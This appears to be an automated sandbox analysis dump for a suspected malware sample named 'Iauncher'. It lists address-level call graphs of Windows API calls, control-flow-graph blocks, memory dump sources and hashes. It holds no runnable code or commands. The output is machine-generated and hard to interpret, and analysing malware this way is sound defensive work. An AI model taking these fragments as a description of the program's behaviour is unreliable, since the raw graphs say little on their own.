70600->70602 70600->70603 70600->70604 70607 5cb1140 3 API calls 70601->70607 70601->70611 70613 5cb1140 3 API calls 70602->70613 70614 5cb1140 3 API calls 70603->70614 70608 5cb1140 3 API calls 70604->70608 70605->70601 70610 5cbfa3c 70605->70610 70607->70611 70608->70611 70615 5cb1140 3 API calls 70609->70615 70692 5cbeef8 CallWindowProcW CallWindowProcW CallWindowProcW 70610->70692 70611->70561 70613->70611 70614->70611 70615->70611 70616 5cb1140 3 API calls 70616->70611 70617->70616 70619 7442181 70618->70619 70621 7442122 70618->70621 70620 7442188 70619->70620 70622 4e05a28 3 API calls 70619->70622 70623 4e05a38 3 API calls 70619->70623 70620->70561 70621->70561 70622->70620 70623->70620 70625 5cb10df 70624->70625 70626 5cb10e9 70624->70626 70627 5cb1140 3 API calls 70625->70627 70626->70561 70627->70626 70629 74421a0 70628->70629 70630 74421ab 70629->70630 70632 5cb1140 3 API calls 70629->70632 70630->70561 70631 74421b7 70631->70561 70632->70631 70634 5cb13be 70633->70634 70636 5cb13ce 70633->70636 70634->70561 70635 5cb141b 70634->70635 70693 5cb1450 70634->70693 70698 5cb1460 70634->70698 70635->70561 70636->70561 70640 5cb1083 70639->70640 70641 5cb108b 70640->70641 70642 5cb1140 3 API calls 70640->70642 70641->70561 70642->70641 70644 5cbf779 70643->70644 70645 5cbf810 70643->70645 70646 5cbf783 70644->70646 70650 5cbf79a 70644->70650 70652 5cbf7c0 70644->70652 70647 5cbf78c 70645->70647 70649 5cbfa97 70645->70649 70658 5cbfa79 70645->70658 70660 5cbfa58 70645->70660 70646->70647 70648 5cbf9a9 70646->70648 70654 5cb1140 3 API calls 70647->70654 70662 5cbf90d 70647->70662 70653 5cbee58 3 API calls 70648->70653 70655 5cb1140 3 API calls 70649->70655 70650->70647 70650->70649 70651 5cbf7b2 70650->70651 70656 5cbf9b7 70650->70656 70650->70658 70650->70660 70650->70662 70666 5cbf8c6 70650->70666 70651->70647 70657 5cbfa3c 70651->70657 70652->70647 70652->70649 70652->70658 70652->70660 70652->70662 70652->70666 70653->70662 70654->70662 70655->70662 70664 5cb1140 3 API calls 70656->70664 70703 5cbeef8 CallWindowProcW CallWindowProcW CallWindowProcW 70657->70703 70661 5cb1140 3 API calls 70658->70661 70663 5cb1140 3 API calls 70660->70663 70661->70662 70662->70561 70663->70662 70664->70662 70665 5cb1140 3 API calls 70665->70662 70666->70665 70668 5cb10df 70667->70668 70669 5cb10e9 70667->70669 70670 5cb1140 3 API calls 70668->70670 70669->70561 70670->70669 70672 7442181 70671->70672 70673 7442122 70671->70673 70674 7442188 70672->70674 70675 4e05a28 3 API calls 70672->70675 70676 4e05a38 3 API calls 70672->70676 70673->70561 70674->70561 70675->70674 70676->70674 70678 74421b2 70677->70678 70680 74421ab 70677->70680 70681 5cb1140 3 API calls 70678->70681 70679 74421b7 70679->70561 70680->70561 70681->70679 70684 5cb13be 70682->70684 70685 5cb13ce 70682->70685 70683 5cb141b 70683->70561 70684->70561 70684->70683 70686 5cb1450 3 API calls 70684->70686 70687 5cb1460 3 API calls 70684->70687 70685->70561 70686->70685 70687->70685 70689 5cbee63 70688->70689 70690 5cb1140 CallWindowProcW CallWindowProcW CallWindowProcW 70689->70690 70691 5cbfe9e 70690->70691 70691->70611 70692->70611 70694 5cb1460 70693->70694 70695 5cb1494 70694->70695 70696 4e05a28 CallWindowProcW CallWindowProcW CallWindowProcW 70694->70696 70697 4e05a38 CallWindowProcW CallWindowProcW CallWindowProcW 70694->70697 70695->70636 70696->70695 70697->70695 70699 5cb1471 70698->70699 70700 5cb1494 70699->70700 70701 4e05a28 CallWindowProcW CallWindowProcW CallWindowProcW 70699->70701 70702 4e05a38 CallWindowProcW CallWindowProcW CallWindowProcW 70699->70702 70700->70636 70701->70700 70702->70700 70703->70662 70714 b0d01c 70716 b0d034 70714->70716 70715 b0d08e 70716->70715 70720 4e02e7c 3 API calls 70716->70720 70721 4e04fb9 70716->70721 70732 4e04259 70716->70732 70736 4e04268 70716->70736 70720->70715 70724 4e04ff5 70721->70724 70722 4e05029 70723 4e02fa4 3 API calls 70722->70723 70726 4e05027 70723->70726 70724->70722 70725 4e05019 70724->70725 70725->70726 70727 4e05150 3 API calls 70725->70727 70728 9f1eec0 3 API calls 70725->70728 70729 9f1eee8 3 API calls 70725->70729 70730 4e0521c 3 API calls 70725->70730 70731 4e0514f 3 API calls 70725->70731 70727->70726 70728->70726 70729->70726 70730->70726 70731->70726 70733 4e04262 70732->70733 70734 4e02e7c 3 API calls 70733->70734 70735 4e042af 70734->70735 70735->70715 70737 4e0428e 70736->70737 70738 4e02e7c 3 API calls 70737->70738 70739 4e042af 70738->70739 70739->70715 70262 7440270 70263 7440278 70262->70263 70265 744028b 70263->70265 70268 5cba520 70263->70268 70273 5cbac28 70263->70273 70264 7440334 70270 5cba52b 70268->70270 70269 5cbb0bd 70269->70264 70270->70269 70278 5cbb560 70270->70278 70284 5cbb550 70270->70284 70274 5cbb0bd 70273->70274 70275 5cbac66 70273->70275 70274->70264 70275->70274 70276 5cbb550 2 API calls 70275->70276 70277 5cbb560 2 API calls 70275->70277 70276->70274 70277->70274 70291 5cba568 70278->70291 70281 5cbb587 70281->70269 70282 5cbb59f CreateIconFromResourceEx 70283 5cbb62e 70282->70283 70283->70269 70285 5cbb560 70284->70285 70286 5cba568 CreateIconFromResourceEx 70285->70286 70287 5cbb57a 70286->70287 70288 5cbb587 70287->70288 70289 5cbb59f CreateIconFromResourceEx 70287->70289 70288->70269 70290 5cbb62e 70289->70290 70290->70269 70292 5cbb5b0 CreateIconFromResourceEx 70291->70292 70293 5cbb57a 70292->70293 70293->70281 70293->70282 70893 b6f840 70894 b6f886 70893->70894 70897 b6fa20 70894->70897 70900 b6f350 70897->70900 70901 b6fa88 DuplicateHandle 70900->70901 70902 b6f973 70901->70902 70294 4e000d8 70295 4e00100 70294->70295 70296 4e00128 70295->70296 70299 4e00188 70295->70299 70304 4e0017a 70295->70304 70296->70296 70300 4e00197 70299->70300 70302 4e01f20 CreateWindowExW 70300->70302 70303 4e01f08 CreateWindowExW 70300->70303 70301 4e001d1 70301->70296 70302->70301 70303->70301 70305 4e00186 70304->70305 70306 4e001cf 70304->70306 70308 4e01f20 CreateWindowExW 70305->70308 70309 4e01f08 CreateWindowExW 70305->70309 70306->70296 70307 4e001d1 70307->70296 70308->70307 70309->70307 70310 4e067d8 70311 4e067da 70310->70311 70318 5cb1b1a 70311->70318 70324 5ccfee0 70311->70324 70328 5ccfed1 70311->70328 70332 5cb1b28 70311->70332 70336 4e080cc 70311->70336 70312 4e06811 70319 5cb1b22 70318->70319 70320 5cb1aa3 70318->70320 70342 5cb1be0 70319->70342 70346 5cb1bd2 70319->70346 70320->70312 70321 5cb1b48 70321->70312 70325 5ccff15 70324->70325 70327 4e080cc CreateWindowExW 70325->70327 70326 5ccff6a 70326->70312 70327->70326 70329 5ccff15 70328->70329 70331 4e080cc CreateWindowExW 70329->70331 70330 5ccff6a 70330->70312 70331->70330 70334 5cb1bd2 CreateWindowExW 70332->70334 70335 5cb1be0 CreateWindowExW 70332->70335 70333 5cb1b48 70333->70312 70334->70333 70335->70333 70337 4e080d5 70336->70337 70339 4e080f3 70336->70339 70338 4e06950 CreateWindowExW 70337->70338 70337->70339 70338->70339 70340 4e06950 CreateWindowExW 70339->70340 70341 4e0822c 70339->70341 70340->70341 70341->70312 70351 4e07e10 70342->70351 70364 4e07e20 70342->70364 70343 5cb1bee 70343->70321 70347 5cb1be0 70346->70347 70349 4e07e20 CreateWindowExW 70347->70349 70350 4e07e10 CreateWindowExW 70347->70350 70348 5cb1bee 70348->70321 70349->70348 70350->70348 70357 4e07e14 70351->70357 70352 4e07dc3 70354 4e08084 70355 4e06950 CreateWindowExW 70354->70355 70356 4e0822c 70354->70356 70355->70356 70356->70343 70357->70352 70357->70354 70376 4e07834 CreateWindowExW 70357->70376 70358 4e07f05 70359 4e06950 CreateWindowExW 70358->70359 70361 4e07fad 70358->70361 70360 4e07f77 70359->70360 70362 4e06950 CreateWindowExW 70360->70362 70363 4e06950 CreateWindowExW 70361->70363 70362->70361 70363->70354 70369 4e07e4c 70364->70369 70366 4e08084 70367 4e06950 CreateWindowExW 70366->70367 70368 4e0822c 70366->70368 70367->70368 70368->70343 70369->70366 70377 4e07834 CreateWindowExW 70369->70377 70370 4e07f05 70371 4e06950 CreateWindowExW 70370->70371 70375 4e07fad 70370->70375 70372 4e07f77 70371->70372 70373 4e06950 CreateWindowExW 70372->70373 70373->70375 70374 4e06950 CreateWindowExW 70374->70366 70375->70374 70376->70358 70377->70370 70378 4e044dd 70379 4e044e7 70378->70379 70380 4e04636 70379->70380 70382 4e042c8 70379->70382 70385 4e02e8c 70382->70385 70386 4e042f8 SetWindowLongW 70385->70386 70387 4e042e0 70386->70387 70387->70380 70903 b6d848 70904 b6d85c 70903->70904 70906 b6d881 70904->70906 70907 b6cfc8 70904->70907 70908 b6da28 LoadLibraryExW 70907->70908 70910 b6daa1 70908->70910 70910->70906

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 296 9f1531c-9f167c2 299 9f167c4 296->299 300 9f167c9-9f16884 call 9f15350 296->300 299->300 305 9f16a74-9f16c88 call 9f15350 300->305 306 9f1688a-9f16891 300->306 337 9f16c89-9f16ea4 call 9f15360 305->337 306->306 307 9f16893-9f16898 306->307 308 9f168aa-9f168b8 307->308 309 9f1689a-9f168a4 307->309 311 9f168ea-9f168ec 308->311 312 9f168ba-9f168c1 308->312 309->308 315 9f168f2-9f16900 311->315 312->312 314 9f168c3-9f168e8 312->314 314->315 317 9f16906-9f1690d 315->317 318 9f1698c-9f169ce call 9f10998 315->318 317->317 321 9f1690f-9f16987 317->321 328 9f169d0-9f169d7 318->328 329 9f169e8-9f16a58 318->329 333 9f16a6d-9f16a6f 321->333 328->328 332 9f169d9-9f169e3 328->332 334 9f16a6c 329->334 341 9f16a5a-9f16a61 329->341 332->334 333->337 334->333 362 9f16f32-9f170d1 call 9f15360 337->362 363 9f16ea4 337->363 341->341 342 9f16a63-9f16a6b 341->342 342->334 381 9f170d7-9f170f2 362->381 382 9f173cb-9f173f8 362->382 363->362 364 9f16eaa-9f16eb1 363->364 367 9f16eb3-9f16f31 364->367 367->362 385 9f170f8-9f1719f call 9f10ba0 call 9f12f58 381->385 386 9f172dc-9f173bd call 7925f60 call 7926bc8 381->386 383 9f173fa-9f17401 382->383 384 9f1740d-9f1742c call 9f10998 382->384 383->383 387 9f17403 383->387 393 9f1745b-9f17469 384->393 394 9f1742e-9f17435 384->394 410 9f171a1 385->410 411 9f171a6-9f17241 call 9f10ba0 385->411 416 9f173c2-9f173c3 386->416 387->384 398 9f17477-9f17546 393->398 394->394 396 9f17437-9f17450 call 9f15370 394->396 405 9f17452-9f17459 396->405 406 9f1746b-9f17471 396->406 429 9f17548-9f1754f 398->429 430 9f1758d-9f175ea 398->430 405->393 405->405 406->398 410->411 434 9f172d5-9f172d7 411->434 435 9f17247-9f172d4 411->435 417 9f173c4-9f173c6 416->417 419 9f17957-9f1796e 417->419 422 9f17974-9f17ad6 call 9f12998 call 9f128f0 call 9f12998 call 9f12b50 419->422 423 9f17ad7-9f17aee 419->423 422->423 426 9f17af4-9f17afb 423->426 427 9f17c96-9f17ced call 9f10a80 423->427 426->426 432 9f17afd-9f17c95 call 9f128f0 call 9f12998 call 9f128f0 call 9f12998 call 9f12b50 426->432 449 9f17d24-9f17d52 427->449 450 9f17cef-9f17cf6 427->450 429->429 436 9f17551-9f17588 429->436 462 9f1762d-9f17642 430->462 463 9f175ec-9f175f3 430->463 432->427 434->417 435->434 454 9f17643-9f17687 call 9f13d78 436->454 465 9f17e07-9f17e5e call 9f10a80 449->465 466 9f17d58-9f17d5f 449->466 450->450 452 9f17cf8-9f17d23 450->452 452->449 472 9f1779a-9f17955 454->472 473 9f1768d-9f17694 454->473 462->454 463->463 470 9f175f5-9f1762b 463->470 492 9f17e60-9f17e67 465->492 493 9f17e95 465->493 466->466 471 9f17d61-9f17dc1 call 9f10a80 466->471 470->454 495 9f17e00-9f17e02 471->495 496 9f17dc3-9f17dca 471->496 524 9f17956 472->524 473->473 478 9f17696-9f176cd call 9f10998 473->478 497 9f17703-9f17725 478->497 498 9f176cf-9f17701 478->498 492->492 502 9f17e69-9f17e94 492->502 494 9f17e96-9f17e9e 493->494 495->494 496->496 503 9f17dcc-9f17dff 496->503 512 9f1772b-9f17795 497->512 498->512 502->493 503->495 512->524 524->419
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: d$d$d$d$d$d
                                                                                                                                                                              • API String ID: 0-3846220497
                                                                                                                                                                              • Opcode ID: 8f25caf442275b79e280f87d51c77f78de571640d86ef470c54f7a09c428c610
                                                                                                                                                                              • Instruction ID: e94b0983b725005ad796b28586291603f56222b0dce29261160179f517d01bd0
                                                                                                                                                                              • Opcode Fuzzy Hash: 8f25caf442275b79e280f87d51c77f78de571640d86ef470c54f7a09c428c610
                                                                                                                                                                              • Instruction Fuzzy Hash: 2922D535900A29DFDF12CF54CC58ADABBB2FF4A306F0581D5E909AB260D7729A95CF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 530 5cc009f-5cc00e3 533 5cc00ed-5cc0188 530->533 534 5cc00e5-5cc00ec 530->534 1929 5cc018b call 5cc8daf 533->1929 1930 5cc018b call 5cc8dc0 533->1930 546 5cc0190-5cc15a6 794 5cc15a8-5cc15b4 546->794 795 5cc15d0 546->795 797 5cc15be-5cc15c4 794->797 798 5cc15b6-5cc15bc 794->798 796 5cc15d6-5cc3081 795->796 1931 5cc3083 call 5cb0a38 796->1931 1932 5cc3083 call 5cb0a80 796->1932 1933 5cc3083 call 5cb0a70 796->1933 799 5cc15ce 797->799 798->799 799->796 1080 5cc3088-5cc3d16 1204 5cc3d18-5cc3d24 1080->1204 1205 5cc3d40 1080->1205 1206 5cc3d2e-5cc3d34 1204->1206 1207 5cc3d26-5cc3d2c 1204->1207 1208 5cc3d46-5cc3ecd 1205->1208 1209 5cc3d3e 1206->1209 1207->1209 1224 5cc3ed4-5cc4f0d 1208->1224 1209->1208 1386 5cc4f0f-5cc4f1b 1224->1386 1387 5cc4f37 1224->1387 1388 5cc4f1d-5cc4f23 1386->1388 1389 5cc4f25-5cc4f2b 1386->1389 1390 5cc4f3d-5cc7243 1387->1390 1391 5cc4f35 1388->1391 1389->1391 1739 5cc726d 1390->1739 1740 5cc7245-5cc7251 1390->1740 1391->1390 1741 5cc7273-5cc7fe3 1739->1741 1742 5cc725b-5cc7261 1740->1742 1743 5cc7253-5cc7259 1740->1743 1878 5cc7fef-5cc7ffb 1741->1878 1744 5cc726b 1742->1744 1743->1744 1744->1741 1879 5cc8006-5cc80db 1878->1879 1889 5cc80e6-5cc8100 1879->1889 1890 5cc8106-5cc81ce 1889->1890 1899 5cc81f8 1890->1899 1900 5cc81d0-5cc81dc 1890->1900 1903 5cc81fe-5cc8234 1899->1903 1901 5cc81de-5cc81e4 1900->1901 1902 5cc81e6-5cc81ec 1900->1902 1904 5cc81f6 1901->1904 1902->1904 1907 5cc823f-5cc8246 1903->1907 1904->1903 1908 5cc8252-5cc82f9 1907->1908 1916 5cc8300-5cc830d 1908->1916 1917 5cc8314-5cc83e0 1916->1917 1927 5cc83ec-5cc83f8 1917->1927 1928 5cc8403-5cc840b 1927->1928 1929->546 1930->546 1931->1080 1932->1080 1933->1080
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517741148.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cc0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 97d1cb694af0ee8de920636ff2d1732608e1252d346c30e244979300e422db33
                                                                                                                                                                              • Instruction ID: 9fe405e954a1cca2c811c4323f2d78c88fc21bdbcd63352677b0f7b7c297a61c
                                                                                                                                                                              • Opcode Fuzzy Hash: 97d1cb694af0ee8de920636ff2d1732608e1252d346c30e244979300e422db33
                                                                                                                                                                              • Instruction Fuzzy Hash: 20047078905229CFCB25DF64C8889D9BBB1FF49305F1495EAE909A7361DB31AE81CF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1934 5cba520-5cbac60 1937 5cbb143-5cbb1ac 1934->1937 1938 5cbac66-5cbac6b 1934->1938 1944 5cbb1b3-5cbb23b 1937->1944 1938->1937 1939 5cbac71-5cbac8e 1938->1939 1939->1944 1945 5cbac94-5cbac98 1939->1945 1989 5cbb246-5cbb2c6 1944->1989 1947 5cbac9a-5cbaca4 call 5cba530 1945->1947 1948 5cbaca7-5cbacab 1945->1948 1947->1948 1951 5cbacba-5cbacc1 1948->1951 1952 5cbacad-5cbacb7 call 5cba530 1948->1952 1956 5cbaddc-5cbade1 1951->1956 1957 5cbacc7-5cbacf7 1951->1957 1952->1951 1960 5cbade9-5cbadee 1956->1960 1961 5cbade3-5cbade7 1956->1961 1969 5cbb4c6-5cbb4ec 1957->1969 1971 5cbacfd-5cbadd0 call 5cba53c * 2 1957->1971 1964 5cbae00-5cbae30 call 5cba548 * 3 1960->1964 1961->1960 1963 5cbadf0-5cbadf4 1961->1963 1968 5cbadfa-5cbadfd 1963->1968 1963->1969 1964->1989 1990 5cbae36-5cbae39 1964->1990 1968->1964 1978 5cbb4ee-5cbb4fa 1969->1978 1979 5cbb4fc 1969->1979 1971->1956 1998 5cbadd2 1971->1998 1982 5cbb4ff-5cbb504 1978->1982 1979->1982 2005 5cbb2cd-5cbb34f 1989->2005 1990->1989 1993 5cbae3f-5cbae41 1990->1993 1993->1989 1995 5cbae47-5cbae7c 1993->1995 1995->2005 2006 5cbae82-5cbae8b 1995->2006 1998->1956 2012 5cbb357-5cbb3d9 2005->2012 2008 5cbafee-5cbaff2 2006->2008 2009 5cbae91-5cbaeeb call 5cba548 * 2 call 5cba558 * 2 2006->2009 2011 5cbaff8-5cbaffc 2008->2011 2008->2012 2051 5cbaefd 2009->2051 2052 5cbaeed-5cbaef6 2009->2052 2015 5cbb002-5cbb008 2011->2015 2016 5cbb3e1-5cbb40e 2011->2016 2012->2016 2021 5cbb00a 2015->2021 2022 5cbb00c-5cbb041 2015->2022 2030 5cbb415-5cbb495 2016->2030 2026 5cbb048-5cbb04e 2021->2026 2022->2026 2026->2030 2031 5cbb054-5cbb05c 2026->2031 2085 5cbb49c-5cbb4be 2030->2085 2034 5cbb05e-5cbb062 2031->2034 2035 5cbb063-5cbb065 2031->2035 2034->2035 2042 5cbb0c7-5cbb0cd 2035->2042 2043 5cbb067-5cbb08b 2035->2043 2047 5cbb0cf-5cbb0ea 2042->2047 2048 5cbb0ec-5cbb11a 2042->2048 2070 5cbb08d-5cbb092 2043->2070 2071 5cbb094-5cbb098 2043->2071 2068 5cbb122-5cbb12e 2047->2068 2048->2068 2059 5cbaf01-5cbaf03 2051->2059 2058 5cbaef8-5cbaefb 2052->2058 2052->2059 2058->2059 2066 5cbaf0a-5cbaf0e 2059->2066 2067 5cbaf05 2059->2067 2072 5cbaf1c-5cbaf22 2066->2072 2073 5cbaf10-5cbaf17 2066->2073 2067->2066 2068->2085 2086 5cbb134-5cbb140 2068->2086 2076 5cbb0a4-5cbb0b5 2070->2076 2071->1969 2077 5cbb09e-5cbb0a1 2071->2077 2082 5cbaf2c-5cbaf31 2072->2082 2083 5cbaf24-5cbaf2a 2072->2083 2081 5cbafb9-5cbafbd 2073->2081 2123 5cbb0b7 call 5cbb550 2076->2123 2124 5cbb0b7 call 5cbb560 2076->2124 2077->2076 2087 5cbafbf-5cbafd9 2081->2087 2088 5cbafdc-5cbafe8 2081->2088 2089 5cbaf37-5cbaf3d 2082->2089 2083->2089 2085->1969 2087->2088 2088->2008 2088->2009 2092 5cbaf3f-5cbaf41 2089->2092 2093 5cbaf43-5cbaf48 2089->2093 2098 5cbaf4a-5cbaf5c 2092->2098 2093->2098 2095 5cbb0bd-5cbb0c5 2095->2068 2103 5cbaf5e-5cbaf64 2098->2103 2104 5cbaf66-5cbaf6b 2098->2104 2106 5cbaf71-5cbaf78 2103->2106 2104->2106 2111 5cbaf7a-5cbaf7c 2106->2111 2112 5cbaf7e 2106->2112 2114 5cbaf83-5cbaf8e 2111->2114 2112->2114 2115 5cbafb2 2114->2115 2116 5cbaf90-5cbaf93 2114->2116 2115->2081 2116->2081 2118 5cbaf95-5cbaf9b 2116->2118 2119 5cbaf9d-5cbafa0 2118->2119 2120 5cbafa2-5cbafab 2118->2120 2119->2115 2119->2120 2120->2081 2122 5cbafad-5cbafb0 2120->2122 2122->2081 2122->2115 2123->2095 2124->2095
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                              • API String ID: 0-1677660839
                                                                                                                                                                              • Opcode ID: a3567d27c0dc65b70050f1a620152d3599421530bcf0eec4651182f0e09b7158
                                                                                                                                                                              • Instruction ID: 14e8b49b8b2d8430f1b9bcd607b5d3feb578b59fceae4c2fc7ca49d7c5bb843f
                                                                                                                                                                              • Opcode Fuzzy Hash: a3567d27c0dc65b70050f1a620152d3599421530bcf0eec4651182f0e09b7158
                                                                                                                                                                              • Instruction Fuzzy Hash: DC327D70E002188FEB54DFA9C8907AEBBF2BF84300F14856AD549AB395DF749E45CB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2423 4e0a080-4e0a0ab 2424 4e0a0b2-4e0a156 2423->2424 2425 4e0a0ad 2423->2425 2428 4e0a158-4e0a15f 2424->2428 2429 4e0a1b9-4e0a20c 2424->2429 2425->2424 2428->2428 2430 4e0a161-4e0a166 2428->2430 2439 4e0a212-4e0a219 2429->2439 2431 4e0a178-4e0a1b7 2430->2431 2432 4e0a168-4e0a172 2430->2432 2431->2439 2432->2431 2440 4e0a243 2439->2440 2441 4e0a21b-4e0a227 2439->2441 2444 4e0a249-4e0a289 2440->2444 2442 4e0a231-4e0a237 2441->2442 2443 4e0a229-4e0a22f 2441->2443 2445 4e0a241 2442->2445 2443->2445 2448 4e0a7eb-4e0a7f7 2444->2448 2445->2444 2449 4e0a7fd-4e0a804 2448->2449 2450 4e0a28e-4e0a29a 2448->2450 2449->2449 2451 4e0a806-4e0a80d 2449->2451 2452 4e0a2a1-4e0a2c0 2450->2452 2453 4e0a29c 2450->2453 2455 4e0a2c2-4e0a2c9 2452->2455 2456 4e0a30a-4e0a37f 2452->2456 2453->2452 2455->2455 2457 4e0a2cb-4e0a305 2455->2457 2467 4e0a3e0-4e0a41b 2456->2467 2468 4e0a381-4e0a388 2456->2468 2462 4e0a7c3-4e0a7e8 2457->2462 2462->2448 2474 4e0a423-4e0a42b 2467->2474 2468->2468 2469 4e0a38a-4e0a3de 2468->2469 2469->2474 2476 4e0a47c-4e0a482 2474->2476 2477 4e0a484-4e0a547 2476->2477 2478 4e0a42d-4e0a44c 2476->2478 2489 4e0a591-4e0a595 2477->2489 2490 4e0a549-4e0a550 2477->2490 2479 4e0a453-4e0a479 2478->2479 2480 4e0a44e 2478->2480 2479->2476 2480->2479 2492 4e0a597-4e0a59e 2489->2492 2493 4e0a5df-4e0a5e3 2489->2493 2490->2490 2491 4e0a552-4e0a58b 2490->2491 2491->2489 2492->2492 2496 4e0a5a0-4e0a5d9 2492->2496 2494 4e0a5e5-4e0a5ec 2493->2494 2495 4e0a62d-4e0a631 2493->2495 2494->2494 2497 4e0a5ee-4e0a627 2494->2497 2498 4e0a693-4e0a6c0 2495->2498 2499 4e0a633-4e0a63b 2495->2499 2496->2493 2497->2495 2507 4e0a6c2-4e0a6f5 2498->2507 2508 4e0a6f7-4e0a721 2498->2508 2501 4e0a682-4e0a688 2499->2501 2505 4e0a68a-4e0a691 2501->2505 2506 4e0a63d-4e0a67f 2501->2506 2505->2498 2505->2505 2506->2501 2512 4e0a72a-4e0a7a9 2507->2512 2508->2512 2517 4e0a7b0-4e0a7bd 2512->2517 2517->2462
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 4'^q$pbq
                                                                                                                                                                              • API String ID: 0-3872760177
                                                                                                                                                                              • Opcode ID: ffe10bc3e2cc97a2c675133d83b4d37d323ba961dcf6e55d88dec30a3dea1878
                                                                                                                                                                              • Instruction ID: a3c7ad92a48597304da340b3fb00c60ac575de76a4591dc877be12c40e9eca42
                                                                                                                                                                              • Opcode Fuzzy Hash: ffe10bc3e2cc97a2c675133d83b4d37d323ba961dcf6e55d88dec30a3dea1878
                                                                                                                                                                              • Instruction Fuzzy Hash: 9632CF75A00218DFDB15CFA8C984F99BBB2FF49304F1580E9E509AB261DB31AE91DF50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: cf283de63935a38d7ea067ae8b2da9a67f1b2aa52cf77d422d4b5e0a2399a139
                                                                                                                                                                              • Instruction ID: c7b408e8396e5386babf7a432080a5835617518a3dde3e07427f4f96a7b4dc60
                                                                                                                                                                              • Opcode Fuzzy Hash: cf283de63935a38d7ea067ae8b2da9a67f1b2aa52cf77d422d4b5e0a2399a139
                                                                                                                                                                              • Instruction Fuzzy Hash: 35A2D075900A29CFCB21DF64CC94B9ABBB2FF49301F0591E9E508AB261DB319E94DF44
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f366a0a00589d3648c79a4ee170bd3c80911ab2cce2ccd83b95cd096d96a0eda
                                                                                                                                                                              • Instruction ID: cee8bb2e652d6404f3d8926628fae6a0d7a3ff54409c13304f7b45d0dcc2e579
                                                                                                                                                                              • Opcode Fuzzy Hash: f366a0a00589d3648c79a4ee170bd3c80911ab2cce2ccd83b95cd096d96a0eda
                                                                                                                                                                              • Instruction Fuzzy Hash: 7292D1359116289FCB26EF64C854BD9BBB6BF4A300F0191E9E50C6B261DB71ABC4DF40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6fc6b9a6514a6d5c7dd711f8987fab13207a7c6320eb802d395034f4aab3c43f
                                                                                                                                                                              • Instruction ID: 26212aeca051e37f5f6421421644af62d1426cc373496163948cfa92094c6988
